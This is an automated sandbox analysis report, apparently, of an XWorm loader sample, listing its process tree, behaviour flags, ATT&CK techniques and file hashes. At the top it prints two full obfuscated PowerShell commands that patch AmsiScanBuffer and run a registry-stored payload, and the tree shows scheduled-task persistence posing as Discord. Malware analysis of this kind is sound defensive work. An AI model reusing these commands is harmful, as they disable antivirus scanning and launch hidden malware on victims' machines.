C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XKnSftNraHzw{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wQRKUtcFbwhIsT,[Parameter(Position=1)][Type]$SGlyOqrFPf)$LaJSxrnlxpL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+''+'m'+''+'o'+'r'+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+'g'+'a'+''+'t'+''+[Char](101)+'T'+'y'+''+[Char](112)+''+[Char](101)+'','C'+'l'+''+[Char](97)+'s'+[Char](115)+','+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+',A'+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+'s'+'',[MulticastDelegate]);$LaJSxrnlxpL.DefineConstructor('R'+[Char](84)+'S'+'p'+''+[Char](101)+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$wQRKUtcFbwhIsT).SetImplementationFlags(''+'R'+''+'u'+'n'+'t'+''+'i'+''+'m'+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+'d');$LaJSxrnlxpL.DefineMethod('I'+'n'+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+',H'+[Char](105)+'d'+[Char](101)+''+'B'+''+'y'+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+'S'+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+'u'+''+'a'+''+'l'+'',$SGlyOqrFPf,$wQRKUtcFbwhIsT).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+'i'+'m'+''+[Char](101)+''+[Char](44)+''+'M'+'a'+[Char](110)+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $LaJSxrnlxpL.CreateType();}$nuiIxRcZpRTVn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+'t'+''+'e'+'m.'+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+'o'+[Char](115)+''+'o'+'f'+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+'n'+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+'s'+'af'+[Char](101)+''+'N'+''+'a'+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+'e'+'t'+''+[Char](104)+''+'o'+'ds');$HCvJfvstKGVxzk=$nuiIxRcZpRTVn.GetMethod('Get'+[Char](80)+'r'+'o'+''+[Char](99)+''+'A'+''+[Char](100)+'d'+[Char](114)+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$yQmYBCNmLyMqauQBXbq=XKnSftNraHzw @([String])([IntPtr]);$dzigsBsmLSAhHhqNqxOrKv=XKnSftNraHzw @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$rjJqOCeTVAS=$nuiIxRcZpRTVn.GetMethod(''+[Char](71)+'e'+[Char](116)+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+[Char](97)+'n'+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$EfnpToWseRKoHZ=$HCvJfvstKGVxzk.Invoke($Null,@([Object]$rjJqOCeTVAS,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+'b'+''+'r'+''+'a'+'ryA')));$SnpphpTJMhjyWrkUp=$HCvJfvstKGVxzk.Invoke($Null,@([Object]$rjJqOCeTVAS,[Object]('V'+'i'+'r'+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+''+'c'+'t')));$OFjNWEJ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EfnpToWseRKoHZ,$yQmYBCNmLyMqauQBXbq).Invoke('a'+[Char](109)+'s'+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$HIwVOszMPDtyLrIiX=$HCvJfvstKGVxzk.Invoke($Null,@([Object]$OFjNWEJ,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+''+[Char](83)+''+'c'+''+'a'+''+'n'+'Bu'+[Char](102)+''+'f'+''+[Char](101)+'r')));$KfifdtTYcK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SnpphpTJMhjyWrkUp,$dzigsBsmLSAhHhqNqxOrKv).Invoke($HIwVOszMPDtyLrIiX,[uint32]8,4,[ref]$KfifdtTYcK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$HIwVOszMPDtyLrIiX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SnpphpTJMhjyWrkUp,$dzigsBsmLSAhHhqNqxOrKv).Invoke($HIwVOszMPDtyLrIiX,[uint32]8,0x20,[ref]$KfifdtTYcK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'OF'+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+'s'+[Char](116)+'a'+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:axNCrTzuDeWo{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lVCxHtFrjlkTWl,[Parameter(Position=1)][Type]$OMGUoTknDe)$gZSQTHpiWsu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'y'+[Char](77)+''+'o'+''+[Char](100)+''+'u'+'le',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+'e'+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+'s,'+[Char](80)+''+'u'+'b'+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+'e'+'a'+'le'+'d'+''+','+'A'+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$gZSQTHpiWsu.DefineConstructor(''+'R'+'T'+'S'+''+'p'+'e'+'c'+''+'i'+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+'id'+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lVCxHtFrjlkTWl).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+'i'+[Char](109)+''+'e'+''+','+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'ged');$gZSQTHpiWsu.DefineMethod(''+'I'+'n'+[Char](118)+'o'+[Char](107)+''+[Char](101)+'','P'+'u'+'b'+'l'+'i'+[Char](99)+','+[Char](72)+'id'+'e'+'By'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+'N'+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+','+''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+'l',$OMGUoTknDe,$lVCxHtFrjlkTWl).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+'me'+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+'d');Write-Output $gZSQTHpiWsu.CreateType();}$bXwhHPsHFYlhh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+'s'+[Char](111)+'ft'+[Char](46)+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+''+'2'+'.U'+'n'+''+'s'+'a'+[Char](102)+'e'+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$EAdbJeCTXeSHWO=$bXwhHPsHFYlhh.GetMethod(''+[Char](71)+'e'+'t'+'P'+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+'d'+'r'+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+''+'u'+'b'+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BUgSiZzHoHJytiRfYQU=axNCrTzuDeWo @([String])([IntPtr]);$qjcFnZPXbmNEKbXFgElzTo=axNCrTzuDeWo @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$rFILPCHdADp=$bXwhHPsHFYlhh.GetMethod('G'+'e'+''+[Char](116)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+'leH'+'a'+''+[Char](110)+'d'+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'nel'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$hxjtumdjJOCnfW=$EAdbJeCTXeSHWO.Invoke($Null,@([Object]$rFILPCHdADp,[Object](''+[Char](76)+''+'o'+''+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+''+'r'+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$dKeorIkmebIeIrkxV=$EAdbJeCTXeSHWO.Invoke($Null,@([Object]$rFILPCHdADp,[Object](''+[Char](86)+'i'+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$fNmpjDQ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hxjtumdjJOCnfW,$BUgSiZzHoHJytiRfYQU).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$cFGcReAVZDtCULlRX=$EAdbJeCTXeSHWO.Invoke($Null,@([Object]$fNmpjDQ,[Object]('A'+'m'+'s'+'i'+'S'+[Char](99)+'a'+[Char](110)+'Bu'+'f'+''+[Char](102)+''+[Char](101)+''+'r'+'')));$QyhVTadAew=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dKeorIkmebIeIrkxV,$qjcFnZPXbmNEKbXFgElzTo).Invoke($cFGcReAVZDtCULlRX,[uint32]8,4,[ref]$QyhVTadAew);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$cFGcReAVZDtCULlRX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dKeorIkmebIeIrkxV,$qjcFnZPXbmNEKbXFgElzTo).Invoke($cFGcReAVZDtCULlRX,[uint32]8,0x20,[ref]$QyhVTadAew);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+'WA'+'R'+''+'E'+'').GetValue('$'+[Char](55)+'7'+[Char](115)+'t'+[Char](97)+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:2688

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1172

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1400

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:1988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1476

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1572

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1728

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1872

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1904

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2004

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1256

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2096

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2472

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2596

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2584

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3076

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of UnmapMainImage
PID:3340

C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x64.exe
"C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x64.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1368

C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3604

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\svchost.exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:4480

C:\Users\Admin\AppData\Roaming\Discord\Discord.exe
"C:\Users\Admin\AppData\Roaming\Discord\Discord.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:396

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Discord\Discord.exe" /rl HIGHEST /f
5⤵
- Creates scheduled task(s)
PID:4740

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /delete /tn "Discord" /f
5⤵
PID:1248

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:3392

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9kfq0615SnBy.bat" "
5⤵
PID:3592

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:4420

C:\Windows\SysWOW64\chcp.com
chcp 65001
6⤵
PID:484

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
6⤵
- Runs ping.exe
PID:976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3592 -s 384
6⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3592 -s 392
6⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3792

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
5⤵
- Executes dropped EXE
PID:4616

C:\Windows\SysWOW64\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Discord.exe" /tr "'C:\Users\Admin\AppData\Roaming\Discord\Discord.exe'" /sc onlogon /rl HIGHEST
5⤵
- Creates scheduled task(s)
PID:1044

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
4⤵
- Executes dropped EXE
PID:2336

C:\Windows\SysWOW64\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77svchost.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\svchost.exe'" /sc onlogon /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:1952

C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x32.exe
"C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x32.exe"
3⤵
- Executes dropped EXE
PID:4492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 900
4⤵
- Program crash
PID:2388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3528

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:3884

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3932

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:4052

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4264

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3596

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:3160

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4392

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3176

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3476

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3320

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4636

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:2624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4492 -ip 4492
2⤵
PID:4420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3592 -ip 3592
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3592 -ip 3592
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2552

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3084

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.56898347-c3a7-440d-aef2-84c3787c9373.tmp.csv
Filesize
36KB

MD5
42831c77cd8fe5482dd157b98fba2ad3

SHA1
49ada71a641942b425d428ccbb586bd82e3adc25

SHA256
bec797bf4ee01cb85e6b28d9dd441f83f88632a80d6be5e1dfab0e767fb9b869

SHA512
576d442cfc13b18f9f78a0e3ed2e6af5f746d8dc5722aab2afd4521b55adacbdf11fde491a305d6b756c6dca60be6715be87dd2aff54f0e93a483ff760c39a48

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.6aac17cc-d02f-4b14-9c6e-f94d750901d1.tmp.txt
Filesize
13KB

MD5
48844630c4e4b04142c185ead67eb0c4

SHA1
ded0f6c4a547e11dd328678de5fa55aaa9162b53

SHA256
28ba7090eaee7f29c06f6de25c65dda0be3a3c8ecdd93bc6cbf6613522e18b9b

SHA512
4e4b324b65a7823345b7ad9d2c99383d85f561e6b91fad2794f073cb7c00fe17f0293a23a8c59a7bed919644fcf26248516ad7963bac75bd95f600dd30d61e86

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.997871a2-18a6-40ea-9ff9-861a991059f5.tmp.txt
Filesize
13KB

MD5
cdbea659e9ce03ce7fb4b26e88aff8de

SHA1
8d22fc2c66c929b22f3d7e47b885361cde652a27

SHA256
ab1aab9e09ba11f36b7b93b8f209c0c7b6e30bf2c4c2c3ff463f6cea4e2efd2f

SHA512
9fb54bc925e69a9973b5f1a96d7325c5235273a96f4f7bb33819ba5d9815ca67aed034c2dca5cf74ca04cf173b510c8da97bd9bce63bac6829b81fee26d9dbce

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.e4bf102d-117d-43a7-8849-e159705d68cb.tmp.csv
Filesize
36KB

MD5
3b2022e46d79bc869e71c531a7f3d951

SHA1
3a33a7b65b5bf34a4e021dea2658f7c6ea949045

SHA256
1f61ea8a795912b92f5e2f6134158d9af58f0e23feaf3b24a46fe8231bdf7b15

SHA512
9bd8364bf175032a0f727a361a7da1367cc9d243f631eeded0a12865eca7f81f163258c49e9689c4e696e55ddda9c59ae6c3be1b6384a5f768df5b887bd758dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\9kfq0615SnBy.bat
Filesize
264B

MD5
397e18286bfb5f61ccc38d1821f8c907

SHA1
2b3391a9f37b94bf0a8ff5f9dab7efb2e655db8f

SHA256
180920884b98cd076c3f593ded1f7a9b7e6960b7e32c5e719004140bcf6d4ede

SHA512
41adeabbdc89114d6ab660699f1877d8860f186a8d47e38f9d5e7fc171c1ece2a20342c4a593c2cee5d4eb53b35de5d7255a459edb7b149c5449325f31652f7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\XWormLoader 5.2 x32.exe
Filesize
109KB

MD5
f3b2ec58b71ba6793adcc2729e2140b1

SHA1
d9e93a33ac617afe326421df4f05882a61e0a4f2

SHA256
2d74eb709aea89a181cf8dfcc7e551978889f0d875401a2f1140487407bf18ae

SHA512
473edcaba9cb8044e28e30fc502a08a648359b3ed0deba85e559fe76b484fc8db0fc2375f746851623e30be33da035cec1d6038e1fcf4842a2afb6f9cd397495

Download Submit
C:\Users\Admin\AppData\Local\Temp\install.exe
Filesize
162KB

MD5
152e3f07bbaf88fb8b097ba05a60df6e

SHA1
c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

SHA256
a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

SHA512
